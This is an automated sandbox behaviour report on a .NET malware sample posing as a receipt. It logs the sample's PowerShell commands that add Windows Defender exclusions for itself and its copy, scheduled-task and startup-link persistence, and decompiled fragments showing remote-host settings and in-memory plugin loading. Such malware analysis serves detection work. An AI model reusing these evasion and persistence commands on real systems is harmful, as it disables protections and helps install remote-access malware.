            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Users\user\Desktop\Recaipt202431029.exe "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Users\user\Desktop\Recaipt202431029.exe "C:\Users\user\Desktop\Recaipt202431029.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Recaipt202431029.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Notepab .lnk.9.drLNK file: ..\..\..\..\..\Notepab .exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Recaipt202431029.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Recaipt202431029.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Recaipt202431029.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: UQzc.pdbSHA256T source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr
            Source: Binary string: UQzc.pdb source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: Recaipt202431029.exe, Form6.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: JvkAPBBIe.exe.0.dr, Form6.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.cs.Net Code: kivwDGmrqN System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs.Net Code: Memory
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.cs.Net Code: kivwDGmrqN System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: Notepab .exe.9.dr, Form6.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: 9.2.Recaipt202431029.exe.40a5570.0.raw.unpack, Form6.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: Recaipt202431029.exeStatic PE information: 0xCBDF6F70 [Sun May 22 04:05:04 2078 UTC]
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06867262 push esp; iretd 0_2_068672B9
